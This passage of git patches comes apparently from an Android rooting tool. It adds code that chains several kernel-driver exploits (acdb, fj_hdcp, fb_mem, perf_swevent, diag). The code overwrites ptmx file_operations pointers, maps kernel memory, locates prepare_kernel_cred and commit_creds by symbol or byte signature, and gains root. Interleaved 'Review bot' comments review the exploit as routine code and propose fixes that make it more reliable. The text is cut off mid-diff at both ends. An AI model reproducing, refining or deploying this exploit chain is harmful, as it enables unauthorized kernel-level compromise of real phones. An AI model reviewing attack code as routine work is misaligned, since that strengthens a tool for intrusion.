-static bool -find_with_diag_exploit(unsigned int ptmx_mmap_address) -{ - struct diag_values 
injection_data; - - injection_data.address = ptmx_mmap_address; - injection_data.value = (uint16_t)&ptmx_mmap; + address = (prepare_kernel_cred_t)memmem(mem, length, &prepare_kernel_cred_asm, prepare_kernel_cred_asm_length); + if (!address) { + return false; + } - return diag_run_exploit(&injection_data, 1, - find_creds_functions_with_mmap, NULL); + prepare_kernel_cred = (prepare_kernel_cred_t)convert_to_kernel_address(address, mem); + return true; } -static bool -find_with_perf_swevent_exploit(unsigned int ptmx_mmap_address) -{ - return perf_swevent_run_exploit(ptmx_mmap_address, (int)&ptmx_mmap, - find_creds_functions_with_mmap, NULL); -} +static uint32_t commit_creds_asm[] = { 0xe92d4070, 0xe1a0200d, 0xe3c23d7f, 0xe1a05000 }; +static size_t commit_creds_asm_length = sizeof(prepare_kernel_cred_asm); static bool -find_creds_functions_in_memory(void) +find_commit_creds_address_in_memory(void *mem, size_t length) { - unsigned long int ptmx_mmap_address; + void *address; - ptmx_mmap_address = get_ptmx_fops_address() + 0x28; + if (commit_creds) { + return true; + } - if (diag_is_supported()) { - return find_with_diag_exploit(ptmx_mmap_address); + address = (commit_creds_t)memmem(mem, length, &commit_creds_asm, commit_creds_asm_length); + if (!address) { + return false; } - return find_with_perf_swevent_exploit(ptmx_mmap_address); + + commit_creds = (commit_creds_t)convert_to_kernel_address(address, mem); + return true; } bool -setup_creds_functions(void) +get_prepare_kernel_cred_address_in_memory(void *mem, size_t length) { - if (kallsyms_exist()) { - prepare_kernel_cred = kallsyms_get_symbol_address("prepare_kernel_cred"); - commit_creds = kallsyms_get_symbol_address("commit_creds"); + if (prepare_kernel_cred) { return true; } - if (get_creds_functions_addresses((void**)&prepare_kernel_cred, (void**)&commit_creds)) { + return find_prepare_kernel_cred_address_in_memory(mem, length); +} + +bool +get_commit_creds_address_in_memory(void *mem, size_t length) +{ + if 
(commit_creds) { return true; } - return find_creds_functions_in_memory(); + return find_commit_creds_address_in_memory(mem, length); } - diff --git a/cred.h b/cred.h index 914e68a..01d928f 100644 --- a/cred.h +++ b/cred.h @@ -19,14 +19,22 @@ #define CREDS_H #include +#include struct cred; struct task_struct; -bool setup_creds_functions(void); +typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *); +typedef int (*commit_creds_t)(struct cred *); -struct cred *(*prepare_kernel_cred)(struct task_struct *); -int (*commit_creds)(struct cred *); +extern bool get_prepare_kernel_cred_address(); +extern bool get_commit_creds_address(); + +extern bool get_prepare_kernel_cred_address_in_memory(void *mem, size_t length); +extern bool get_commit_creds_address_in_memory(void *mem, size_t length); + +extern prepare_kernel_cred_t prepare_kernel_cred; +extern commit_creds_t commit_creds; #endif /* CREDS_H */ /* diff --git a/device_database b/device_database index ffe99ec..6b6fdc8 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit ffe99ec5b334873a4e339675907398e6d9a010e4 +Subproject commit 6b6fdc850489ae9380a272e663bb4c9d1c661f6a diff --git a/exploit.c b/exploit.c new file mode 100644 index 0000000..a1f134a --- /dev/null +++ b/exploit.c 
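Review bot: `static size_t commit_creds_asm_length = sizeof(prepare_kernel_cred_asm);` on the new side measures the wrong array; it works today only because both signature arrays hold four words and breaks silently the moment one of them is lengthened. Change it to `static size_t commit_creds_asm_length = sizeof(commit_creds_asm);`. Separately, `get_prepare_kernel_cred_address_in_memory` and `get_commit_creds_address_in_memory` test the global before calling the `find_*` helpers, whose first statement repeats the same test, so one of the two checks can go. The `(prepare_kernel_cred_t)` and `(commit_creds_t)` casts on the `memmem` results are stored straight into `void *address` and therefore do nothing.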
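Review bot: `extern bool get_prepare_kernel_cred_address();` and `extern bool get_commit_creds_address();` are declared with empty parentheses, which in C is a non-prototype declaration that lets a caller pass arguments without a diagnostic, while the definitions in cred.c take `(void)`. Declare them as `extern bool get_prepare_kernel_cred_address(void);` and `extern bool get_commit_creds_address(void);` to match the other prototypes in this header.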
@@ -0,0 +1,174 @@ +#include +#include +#include +#include + +#include "exploit.h" +#include "mm.h" +#include "device_database.h" +#include "libdiagexploit/diag.h" +#include "libperf_event_exploit/perf_event.h" +#include "libmsm_acdb_exploit/acdb.h" +#include "libfj_hdcp_exploit/fj_hdcp.h" +#include "libfb_mem_exploit/fb_mem.h" + +typedef struct _callback_info_t { + exploit_callback_t func; + void *param; + bool result; +} callback_info_t; + +static bool +run_callback(void *param) +{ + callback_info_t *info = param; + + info->result = info->func(info->param); + + return true; +} + +static bool +attempt_diag_exploit(unsigned long int address, + unsigned long int write_value, + callback_info_t *info) +{ + struct diag_values injection_data; + + if (write_value > (uint16_t)-1) { + return false; + } + + injection_data.address = address; + injection_data.value = (uint16_t)write_value; + + return diag_run_exploit(&injection_data, 1, &run_callback, info); +} + +static bool +attempt_acdb_exploit(unsigned long int address, + unsigned long int write_value, + unsigned long int restore_value, + callback_info_t *info) +{ + if (acdb_run_exploit(address, write_value, &run_callback, info)) { + acdb_write_value_at_address(address, restore_value); + + return true; + } + + return false; +} + +static bool +attempt_fj_hdcp_exploit(unsigned long int address, + unsigned long int write_value, + unsigned long int restore_value, + callback_info_t *info) +{ + if (fj_hdcp_run_exploit(address, write_value, &run_callback, info)) { + fj_hdcp_write_value_at_address(address, restore_value); + + return true; + } + + return false; +} + +static bool +attempt_fb_mem_exploit(unsigned long int address, + unsigned long int write_value, + unsigned long int restore_value, + callback_info_t *info) +{ + unsigned long int kernel_physical_offset; + + kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); + if (kernel_physical_offset) { + 
fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x00008000); + } + + if (fb_mem_write_value_at_address(address, write_value)) { + run_callback(info); + + fb_mem_write_value_at_address(address, restore_value); + + return true; + } + + return false; +} + +bool +attempt_exploit(unsigned long int address, + unsigned long int write_value, + unsigned long int restore_value, + exploit_callback_t callback_func, + void *callback_param) +{ + callback_info_t info; + + info.func = callback_func; + info.param = callback_param; + info.result = false; + + // Attempt exploits in most stable order + + printf("Attempt acdb exploit...\n"); + if (attempt_acdb_exploit(address, write_value, restore_value, &info)) { + return info.result; + } + printf("\n"); + + printf("Attempt fj_hdcp exploit...\n"); + if (attempt_fj_hdcp_exploit(address, write_value, restore_value, &info)) { + return info.result; + } + printf("\n"); + + printf("Attempt fb_mem exploit...\n"); + if (attempt_fb_mem_exploit(address, write_value, restore_value, &info)) { + return info.result; + } + printf("\n"); + + printf("Attempt perf_swevent exploit...\n"); + if (perf_swevent_run_exploit(address, write_value, &run_callback, &info)) { + return info.result; + } + printf("\n"); + + if (attempt_diag_exploit(address, write_value, &info)) { + return info.result; + } + + return false; +} + +bool +attempt_mmap_exploit(exploit_mmap_callback_t callback_func, void *callback_param) +{ + unsigned long int kernel_physical_offset; + int fd; + void *address; + bool result; + + kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); + if (kernel_physical_offset) { + fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x00008000); + } + + printf("Attempt fb_mem exploit...\n"); + address = fb_mem_mmap(&fd); + if (address == MAP_FAILED) { + return false; + } + + result = callback_func(fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, address), + KERNEL_SIZE, + callback_param); + + 
fb_mem_munmap(address, fd); + + return result; +} diff --git a/exploit.h b/exploit.h new file mode 100644 index 0000000..f87ed99 --- /dev/null +++ b/exploit.h @@ -0,0 +1,38 @@ +/* + * Copyright (C) 2013 Hiroyuki Ikezoe + * + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . + * + */ +#ifndef __EXPLOIT_H__ +#define __EXPLOIT_H__ + +#include + +typedef bool (*exploit_callback_t)(void *param); +typedef bool (*exploit_mmap_callback_t)(void *mem, size_t length, void *param); + +extern bool attempt_exploit(unsigned long int address, + unsigned long int write_value, + unsigned long int restore_value, + exploit_callback_t callback_func, + void *callback_param); + +extern bool attempt_mmap_exploit(exploit_mmap_callback_t callback_func, + void *callback_param); + +#endif /* __EXPLOIT_H__ */ +/* +vi:ts=2:nowrap:ai:expandtab:sw=2 +*/ diff --git a/libdiagexploit b/libdiagexploit index 83a2e0c..4dd7f1b 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 83a2e0c09765ac7b0f2c2e138590877f37188e1e +Subproject commit 4dd7f1b0dadb3ae5d8a914e1e22979c7bed3b6c3 diff --git a/libfb_mem_exploit b/libfb_mem_exploit new file mode 160000 index 0000000..02ca1c9 --- /dev/null +++ b/libfb_mem_exploit @@ -0,0 +1 @@ +Subproject commit 02ca1c9ce0277b169373dde32f46386a3173f1b2 diff --git a/libfj_hdcp_exploit b/libfj_hdcp_exploit index cb172ec..d1915b8 160000 --- a/libfj_hdcp_exploit +++ b/libfj_hdcp_exploit 
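Review bot: The `kernel_physical_offset` lookup and the `fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x00008000)` call are duplicated verbatim in `attempt_fb_mem_exploit` and `attempt_mmap_exploit`, and the `0x00008000` adjustment has no name or comment saying what it is. Factor both into one static helper, e.g. `static void setup_fb_mem_phys_offset(void)`, with a one-line comment explaining the constant. In `attempt_exploit`, the diag attempt is the only one without a leading `printf("Attempt ... exploit...\n")` and trailing blank line, so the output format differs for that path alone.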
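Review bot: The include guard `__EXPLOIT_H__` starts with a double underscore, a name reserved for the implementation in C; cred.h in this same series uses the plain `CREDS_H` form. Rename it to `EXPLOIT_H` in the `#ifndef`/`#define` pair and in the closing `#endif /* EXPLOIT_H */` comment.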
@@ -1 +1 @@ -Subproject commit cb172ec96947c0f00033eb461a6718c6e6d7c2a6 +Subproject commit d1915b8cb18c917340a83c6807c5a5fe1053902a diff --git a/libkallsyms b/libkallsyms new file mode 160000 index 0000000..4c910a5 --- /dev/null +++ b/libkallsyms @@ -0,0 +1 @@ +Subproject commit 4c910a5580841d9fb2738804ae1b24dbd02834d2 diff --git a/main.c b/main.c index bde10aa..6d3bec7 100644 --- a/main.c +++ b/main.c @@ -14,10 +14,7 @@ #include "cred.h" #include "mm.h" #include "ptmx.h" -#include "libdiagexploit/diag.h" -#include "libperf_event_exploit/perf_event.h" -#include "libmsm_acdb_exploit/acdb.h" -#include "libfj_hdcp_exploit/fj_hdcp.h" +#include "exploit.h" void obtain_root_privilege(void) 
@@ -39,91 +36,124 @@ run_obtain_root_privilege(void *user_data) } static bool -attempt_diag_exploit(unsigned long int address) +run_exploit(void) +{ + get_ptmx_fops_fsync_address(); + if (!ptmx_fops_fsync_address) { + return false; + } + + return attempt_exploit(ptmx_fops_fsync_address, + (unsigned long int)&obtain_root_privilege, 0, + run_obtain_root_privilege, NULL); +} + +void +device_detected(void) { - struct diag_values injection_data; + char device[PROP_VALUE_MAX]; + char build_id[PROP_VALUE_MAX]; - injection_data.address = address; - injection_data.value = (uint16_t)&obtain_root_privilege; + __system_property_get("ro.product.model", device); + __system_property_get("ro.build.display.id", build_id); - return diag_run_exploit(&injection_data, 1, - run_obtain_root_privilege, NULL); + printf("\n\nDevice detected: %s (%s)\n\n", device, build_id); } static bool -attempt_acdb_exploit(unsigned long int address, unsigned long int original_value) +find_ptmx_fops_address(void *mem, size_t length) { - if (acdb_run_exploit(address, (int)&obtain_root_privilege, - run_obtain_root_privilege, NULL)) { + find_ptmx_fops_hint_t hint; - acdb_write_value_at_address(address, original_value); + hint.ptmx_open_address = kallsyms_in_memory_lookup_name("ptmx_open"); + if (!hint.ptmx_open_address) { + return false; + } - return true; + hint.tty_release_address = kallsyms_in_memory_lookup_name("tty_release"); + if (!hint.tty_release_address) { + return false; } - return false; + hint.tty_fasync_address = kallsyms_in_memory_lookup_name("tty_fasync"); + if (!hint.tty_fasync_address) { + return false; + } + + return get_ptmx_fops_address_in_memory(mem, length, &hint); } -static bool -attempt_fj_hdcp_exploit(unsigned long int address, unsigned long int original_value) +bool find_variables_in_memory(void *mem, size_t length) { - if (fj_hdcp_run_exploit(address, (int)&obtain_root_privilege, - run_obtain_root_privilege, NULL)) { + printf("Search address in memroy...\n"); - 
fj_hdcp_write_value_at_address(address, original_value); + if (kallsyms_in_memory_init(mem, length)) { + printf("Using kallsyms_in_memroy...\n"); - return true; + if (!prepare_kernel_cred) { + prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name("prepare_kernel_cred"); + } + + if (!commit_creds) { + commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name("commit_creds"); + } + + if (!ptmx_fops) { + ptmx_fops = (void *)kallsyms_in_memory_lookup_name("ptmx_fops"); + + if (!ptmx_fops) { + find_ptmx_fops_address(mem, length); + } + } + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + return true; + } } - return false; + get_prepare_kernel_cred_address_in_memory(mem, length); + get_commit_creds_address_in_memory(mem, length); + + return prepare_kernel_cred && commit_creds && ptmx_fops; } -static bool -run_exploit(void) +bool +setup_variables(void) { - unsigned long int ptmx_fsync_address; - unsigned long int ptmx_fops_address; + get_prepare_kernel_cred_address(); + get_commit_creds_address(); + get_ptmx_fops_address(); - ptmx_fops_address = get_ptmx_fops_address(); - if (!ptmx_fops_address) { - return false; + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + return true; } - ptmx_fsync_address = ptmx_fops_address + 0x38; + printf("Try to find address in memory...\n"); + run_with_mmap(find_variables_in_memory); + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); + printf(" commit_creds = %p\n", commit_creds); + printf(" ptmx_fops = %p\n", ptmx_fops); - printf("Attempt perf_swevent exploit...\n"); - if (perf_swevent_run_exploit(ptmx_fsync_address, (int)&obtain_root_privilege, - run_obtain_root_privilege, NULL)) { return true; } - printf("\n"); - printf("Attempt acdb exploit...\n"); - if (attempt_acdb_exploit(ptmx_fsync_address, 0)) { - return true; + if (!prepare_kernel_cred) { + printf("Failed to get prepare_kernel_cred addresses.\n"); } - printf("\n"); - 
printf("Attempt fj_hdcp exploit...\n"); - if (attempt_fj_hdcp_exploit(ptmx_fsync_address, 0)) { - return true; + if (!commit_creds) { + printf("Failed to get commit_creds addresses.\n"); } - printf("\n"); - - return attempt_diag_exploit(ptmx_fsync_address); -} -void -device_detected(void) -{ - char device[PROP_VALUE_MAX]; - char build_id[PROP_VALUE_MAX]; + if (!ptmx_fops) { + printf("Failed to get ptmx_fops addresses.\n"); + } - __system_property_get("ro.product.model", device); - __system_property_get("ro.build.display.id", build_id); + print_reason_device_not_supported(); - printf("\n\nDevice detected: %s (%s)\n\n", device, build_id); + return false; } int @@ -141,15 +171,8 @@ main(int argc, char **argv) device_detected(); - set_kernel_phys_offset(0x200000); - remap_pfn_range = get_remap_pfn_range_address(); - if (!remap_pfn_range) { - printf("You need to manage to get remap_pfn_range addresses.\n"); - exit(EXIT_FAILURE); - } - - if (!setup_creds_functions()) { - printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n"); + if (!setup_variables()) { + printf("Failed to setup variables.\n"); exit(EXIT_FAILURE); } diff --git a/mm.c b/mm.c index b7db0e2..f3f1ab4 100644 --- a/mm.c +++ b/mm.c 
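Review bot: Two user-facing messages in `find_variables_in_memory` are misspelled; they should read `printf("Search address in memory...\n");` and `printf("Using kallsyms_in_memory...\n");`. In `setup_variables`, the three `printf(" ... = %p\n", ...)` lines pass function pointers to `%p`, which expects `void *`; cast them, e.g. `(void *)prepare_kernel_cred`, to keep the calls well-defined. The result of `run_with_mmap(find_variables_in_memory);` is discarded, which is acceptable only because the globals are re-checked on the next line; a short comment saying so would help the next reader.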
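Review bot: This hunk drops the `set_kernel_phys_offset(0x200000)` call and the `remap_pfn_range` check from `main`, yet `get_remap_pfn_range_address()` is still defined in mm.c by this same commit and nothing visible in the patch calls it any more. If `ptmx_mmap` still depends on `remap_pfn_range`, the pointer is now set only if some other path resolves it first; either call `get_remap_pfn_range_address()` from `setup_variables` or document where it is now resolved. The rest of `main` lies outside this hunk.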
@@ -1,31 +1,36 @@ +#include +#include +#include +#include + +#include "exploit.h" #include "kallsyms.h" #include "mm.h" +#include "ptmx.h" +#include "libdiagexploit/diag.h" #include "device_database/device_database.h" -unsigned long int -_get_remap_pfn_range_address(void) -{ - unsigned long int address = device_get_symbol_address(DEVICE_SYMBOL(remap_pfn_range)); - - if (address) { - return address; - } - print_reason_device_not_supported(); +static unsigned long int kernel_phys_offset; - return 0; -} +int (*remap_pfn_range)(struct vm_area_struct *, unsigned long addr, + unsigned long pfn, unsigned long size, pgprot_t); -void * +bool get_remap_pfn_range_address(void) { - if (kallsyms_exist()) { - return kallsyms_get_symbol_address("remap_pfn_range"); + if (remap_pfn_range) { + return true; } - return (void*)_get_remap_pfn_range_address(); -} -static unsigned long int kernel_phys_offset = 0; + remap_pfn_range = (void *)device_get_symbol_address(DEVICE_SYMBOL(remap_pfn_range)); + + if (!remap_pfn_range && kallsyms_exist()) { + remap_pfn_range = kallsyms_get_symbol_address("remap_pfn_range"); + } + + return !!remap_pfn_range; +} void set_kernel_phys_offset(unsigned long int offset) 
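Review bot: get_remap_pfn_range_address no longer calls `print_reason_device_not_supported()` when both lookups fail, which the removed `_get_remap_pfn_range_address` did, so the only diagnostic left on that path is the generic message printed by the caller; add `if (!remap_pfn_range) { print_reason_device_not_supported(); }` before the final `return !!remap_pfn_range;`. The device-database result is cast through `(void *)` while the kallsyms result is assigned bare; if `kallsyms_get_symbol_address` does not return a pointer type (its prototype is not in this hunk) that assignment relies on an implicit conversion and should carry the same explicit cast for consistency.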
@@ -35,6 +40,51 @@ set_kernel_phys_offset(unsigned long int offset)
 
 #define PAGE_SHIFT 12
 
+void *
+convert_to_kernel_address(void *address, void *mmap_base_address)
+{
+ return address - mmap_base_address + (void*)PAGE_OFFSET;
+}
+
+void *
+convert_to_mmaped_address(void *address, void *mmap_base_address)
+{
+ return mmap_base_address + (address - (void*)PAGE_OFFSET);
+}
+
+static bool
+detect_kernel_phys_parameters(void)
+{
+ FILE *fp;
+ void *system_ram_address;
+ char name[BUFSIZ];
+ void *start_address, *end_address;
+ int ret;
+
+ system_ram_address = NULL;
+
+ fp = fopen("/proc/iomem", "r");
+ if (!fp) {
+ printf("Failed to open /proc/iomem due to %s.\n", strerror(errno));
+ return false;
+ }
+
+ while ((ret = fscanf(fp, "%p-%p : %[^\n]", &start_address, &end_address, name)) != EOF) {
+ if (!strcmp(name, "System RAM")) {
+ system_ram_address = start_address;
+ continue;
+ }
+ if (!strncmp(name, "Kernel", 6)) {
+ break;
+ }
+ }
+ fclose(fp);
+
+ set_kernel_phys_offset((int)system_ram_address);
+
+ return true;
+}
+
 int
 ptmx_mmap(struct file *filep, struct vm_area_struct *vma)
 {
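Review bot: The `%[^\n]` conversion in detect_kernel_phys_parameters has no field width, so a long line in /proc/iomem overruns `name`, and a line that fails to match leaves `ret` at 0 with the offending input unconsumed, so the `!= EOF` loop never terminates and `name` is compared before anything was stored in it. The function also returns true when no "System RAM" entry was seen, passing a NULL cast through `int` to set_kernel_phys_offset, so run_with_mmap cannot tell that detection failed; on kernels that hide /proc/iomem addresses from unprivileged readers the parse yields 0 and this is the path that will be taken. Bound the conversion, stop on a partial match and fail when nothing was found.
```c
  char name[256];
  /* … unchanged: fopen and its error path … */
  while ((ret = fscanf(fp, "%p-%p : %255[^\n]", &start_address, &end_address, name)) != EOF) {
    if (ret != 3) {
      break; /* malformed line: input is not consumed, so do not spin */
    }
    if (!strcmp(name, "System RAM")) {
      system_ram_address = start_address;
      continue;
    }
    if (!strncmp(name, "Kernel", 6)) {
      break;
    }
  }
  fclose(fp);

  if (!system_ram_address) {
    printf("Failed to find System RAM in /proc/iomem.\n");
    return false;
  }
  set_kernel_phys_offset((unsigned long int)system_ram_address);
```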
@@ -43,3 +93,97 @@ ptmx_mmap(struct file *filep, struct vm_area_struct *vma) vma->vm_end - vma->vm_start, vma->vm_page_prot); } +static bool +run_callback_with_mmap(void *user_data) +{ + int fd; + void *address; + void *start_address = (void *)0x20000000; + mmap_callback_t callback = (mmap_callback_t)user_data; + bool ret; + + fd = open(PTMX_DEVICE, O_RDWR); + address = mmap(start_address, KERNEL_SIZE, + PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED, + fd, 0); + if (address == MAP_FAILED) { + printf("Failed to mmap /dev/ptmx due to %s.\n", strerror(errno)); + close(fd); + return false; + } + + ret = callback(address, KERNEL_SIZE); + + munmap(address, KERNEL_SIZE); + + close(fd); + + return ret; +} + +typedef struct _callback_mmap_exploit_info_t { + mmap_callback_t func; + bool result; +} callback_mmap_exploit_info_t; + +static bool +run_callback_mmap_exploit(void *address, size_t length, void *param) +{ + callback_mmap_exploit_info_t *info = param; + + info->result = info->func(address, length); + + return true; +} + +static bool +run_exploit_mmap(mmap_callback_t callback, bool *result) +{ + callback_mmap_exploit_info_t info; + + info.func = callback; + + if (attempt_mmap_exploit(&run_callback_mmap_exploit, &info)) { + *result = info.result; + return true; + } + + return false; +} + +bool +run_with_mmap(mmap_callback_t callback) +{ + unsigned long int kernel_physical_offset; + bool result; + + if (run_exploit_mmap(callback, &result)) { + return result; + } + + get_remap_pfn_range_address(); + + if (!remap_pfn_range) { + printf("You need to manage to get remap_pfn_range addresses.\n"); + return false; + } + + get_ptmx_fops_mmap_address(); + if (!ptmx_fops_mmap_address) { + printf("You need to manage to get ptmx_fops addresses.\n"); + return false; + } + + kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); + if (kernel_physical_offset) { + set_kernel_phys_offset(kernel_physical_offset - 0x00008000); + } + else if 
(!detect_kernel_phys_parameters()) { + printf("You need to manage to get kernel_physical_offset addresses.\n"); + return false; + } + + return attempt_exploit(ptmx_fops_mmap_address, + (unsigned long int)&ptmx_mmap, 0, + run_callback_with_mmap, callback); +} diff --git a/mm.h b/mm.h index 38aecbf..e052be6 100644 --- a/mm.h +++ b/mm.h @@ -18,6 +18,12 @@ #ifndef MM_H #define MM_H +#include +#include + +#define PAGE_OFFSET 0xc0000000 +#define KERNEL_SIZE 0x10000000 + struct file; typedef struct { @@ -32,13 +38,17 @@ struct vm_area_struct { /* ... */ }; -int (*remap_pfn_range)(struct vm_area_struct *, unsigned long addr, - unsigned long pfn, unsigned long size, pgprot_t); +typedef bool (*mmap_callback_t)(void *mem, size_t length); + +extern bool get_remap_pfn_range_address(void); +extern bool run_with_mmap(mmap_callback_t callback); -void *get_remap_pfn_range_address(void); +extern void set_kernel_phys_offset(unsigned long int offset); +extern void *convert_to_kernel_address(void *address, void *mmap_base_address); +extern void *convert_to_mmaped_address(void *address, void *mmap_base_address); -void set_kernel_phys_offset(unsigned long int offset); -int ptmx_mmap(struct file *filep, struct vm_area_struct *vma); +extern int (*remap_pfn_range)(struct vm_area_struct *, unsigned long addr, + unsigned long pfn, unsigned long size, pgprot_t); #endif /* MM_H */ /* diff --git a/ptmx.c b/ptmx.c index ca79c4f..5022a2e 100644 --- a/ptmx.c +++ b/ptmx.c 
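Review bot: run_callback_with_mmap never checks the result of `open(PTMX_DEVICE, O_RDWR)`, so a failed open reaches mmap with fd -1 and is reported as an mmap failure; add `if (fd < 0) { printf("Failed to open %s due to %s.\n", PTMX_DEVICE, strerror(errno)); return false; }` directly after the open, and check the `munmap` return as well. The mapping is requested with MAP_FIXED at the hard-coded `start_address` 0x20000000, which silently replaces whatever the process already has mapped there; either document why a fixed address is required or drop MAP_FIXED and use the address mmap returns. In run_with_mmap the `- 0x00008000` applied to the device-database value is an unexplained magic constant and `result` is only set when run_exploit_mmap succeeds, which is correct but worth a comment since the variable is read immediately afterwards.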
@@ -1,23 +1,73 @@ +#include +#include #include "ptmx.h" +#include "kallsyms.h" #include "device_database/device_database.h" -unsigned long int +void *ptmx_fops; +unsigned long int ptmx_fops_mmap_address; +unsigned long int ptmx_fops_fsync_address; + +bool get_ptmx_fops_address(void) { - unsigned long int address; + if (ptmx_fops) { + return true; + } + + ptmx_fops = (void *)device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops)); - address = device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops)); - if (address) { - return address; + if (!ptmx_fops && kallsyms_exist()) { + ptmx_fops = kallsyms_get_symbol_address("ptmx_fops"); } - if (kallsyms_exist()) { - address = kallsyms_get_symbol_address("ptmx_fops"); - if (address) { - return address; + return !!ptmx_fops; +} + +bool +get_ptmx_fops_mmap_address(void) +{ + if (!ptmx_fops) { + get_ptmx_fops_address(); + if (!ptmx_fops) { + return false; } } - print_reason_device_not_supported(); - return 0; + ptmx_fops_mmap_address = (unsigned long int)ptmx_fops + 0x28; + return true; +} + +bool +get_ptmx_fops_fsync_address(void) +{ + if (!ptmx_fops) { + get_ptmx_fops_address(); + if (!ptmx_fops) { + return false; + } + } + + ptmx_fops_fsync_address = (unsigned long int)ptmx_fops + 0x38; + return true; +} + +bool +get_ptmx_fops_address_in_memory(void *mem, size_t length, find_ptmx_fops_hint_t *hint) +{ + unsigned long int pattern[16]; + void *address; + + memset(pattern, 0, sizeof pattern); + pattern[2] = hint->ptmx_open_address; + pattern[4] = hint->tty_release_address; + pattern[7] = hint->tty_fasync_address; + + address = memmem(mem, length, pattern, sizeof pattern); + if (!address) { + return false; + } + + ptmx_fops = (void *)convert_to_kernel_address(address, mem) - 0x24; + return true; } diff --git a/ptmx.h b/ptmx.h index 84987c4..9495ff2 100644 --- a/ptmx.h +++ b/ptmx.h 
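Review bot: The offsets `0x28`, `0x38` and `0x24` in get_ptmx_fops_mmap_address, get_ptmx_fops_fsync_address and get_ptmx_fops_address_in_memory are bare magic numbers; presumably they are member offsets into the targeted kernel's file_operations and the distance from the matched pattern to the start of that struct, which may differ between builds, so they belong in a named enum next to the `ptmx_fops` globals with a comment stating which layout they assume, e.g. `enum { PTMX_FOPS_MMAP_OFFSET = 0x28, PTMX_FOPS_FSYNC_OFFSET = 0x38 };`. get_ptmx_fops_address_in_memory dereferences `hint` without a NULL check and relies on `memmem`, a GNU extension that only gets a prototype when `_GNU_SOURCE` is defined before the first include; the header names did not survive in this listing, so please confirm the build defines it. The mmap and fsync helpers repeat the same `if (!ptmx_fops) { get_ptmx_fops_address(); ... }` prologue, which can be `if (!get_ptmx_fops_address()) { return false; }` since that function already returns whether `ptmx_fops` is set.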
@@ -18,9 +18,27 @@ #ifndef PTMX_H #define PTMX_H +#include +#include + #define PTMX_DEVICE "/dev/ptmx" -unsigned long int get_ptmx_fops_address(void); +typedef struct _find_ptmx_fops_hint_t { + unsigned long int ptmx_open_address; + unsigned long int tty_release_address; + unsigned long int tty_fasync_address; +} find_ptmx_fops_hint_t; + +extern bool get_ptmx_fops_address(void); +extern bool get_ptmx_fops_mmap_address(void); +extern bool get_ptmx_fops_fsync_address(void); + +extern bool get_ptmx_fops_address_in_memory(void *mem, size_t length, + find_ptmx_fops_hint_t *hint); + +extern void *ptmx_fops; +extern unsigned long int ptmx_fops_mmap_address; +extern unsigned long int ptmx_fops_fsync_address; #endif /* PTMX_H */ /* From de1f5f66d71091e2303ce04e15f5cebd3d011130 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Thu, 25 Jul 2013 20:55:46 +0900 Subject: [PATCH 067/125] Fix indentation --- exploit.h | 2 +- main.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/exploit.h b/exploit.h index f87ed99..00cb5cb 100644 --- a/exploit.h +++ b/exploit.h @@ -27,7 +27,7 @@ extern bool attempt_exploit(unsigned long int address, unsigned long int write_value, unsigned long int restore_value, exploit_callback_t callback_func, - void *callback_param); + void *callback_param); extern bool attempt_mmap_exploit(exploit_mmap_callback_t callback_func, void *callback_param); diff --git a/main.c b/main.c index 6d3bec7..69efba6 100644 --- a/main.c +++ b/main.c @@ -102,7 +102,7 @@ bool find_variables_in_memory(void *mem, size_t length) ptmx_fops = (void *)kallsyms_in_memory_lookup_name("ptmx_fops"); if (!ptmx_fops) { - find_ptmx_fops_address(mem, length); + find_ptmx_fops_address(mem, length); } } From 23c69465307a9e844a2c0133a14a6a345c6127e7 Mon Sep 17 00:00:00 2001 
From: fi01 Date: Fri, 26 Jul 2013 08:43:37 +0900 Subject: [PATCH 068/125] Rename function get_xx_address() to setup_xx_address() --- cred.c | 8 ++++---- cred.h | 8 ++++---- exploit.c | 17 +++++++++++++++++ exploit.h | 2 +- main.c | 14 +++++++------- mm.c | 6 +++--- mm.h | 2 +- ptmx.c | 12 ++++++------ ptmx.h | 10 +++++----- 9 files changed, 48 insertions(+), 31 deletions(-) diff --git a/cred.c b/cred.c index 5c35823..2e45e13 100644 --- a/cred.c +++ b/cred.c @@ -10,7 +10,7 @@ prepare_kernel_cred_t prepare_kernel_cred; commit_creds_t commit_creds; bool -get_prepare_kernel_cred_address(void) +setup_prepare_kernel_cred_address(void) { if (prepare_kernel_cred) { return true; @@ -26,7 +26,7 @@ get_prepare_kernel_cred_address(void) } bool -get_commit_creds_address(void) +setup_commit_creds_address(void) { if (commit_creds) { return true; @@ -84,7 +84,7 @@ find_commit_creds_address_in_memory(void *mem, size_t length) } bool -get_prepare_kernel_cred_address_in_memory(void *mem, size_t length) +setup_prepare_kernel_cred_address_in_memory(void *mem, size_t length) { if (prepare_kernel_cred) { return true; @@ -94,7 +94,7 @@ get_prepare_kernel_cred_address_in_memory(void *mem, size_t length) } bool -get_commit_creds_address_in_memory(void *mem, size_t length) +setup_commit_creds_address_in_memory(void *mem, size_t length) { if (commit_creds) { 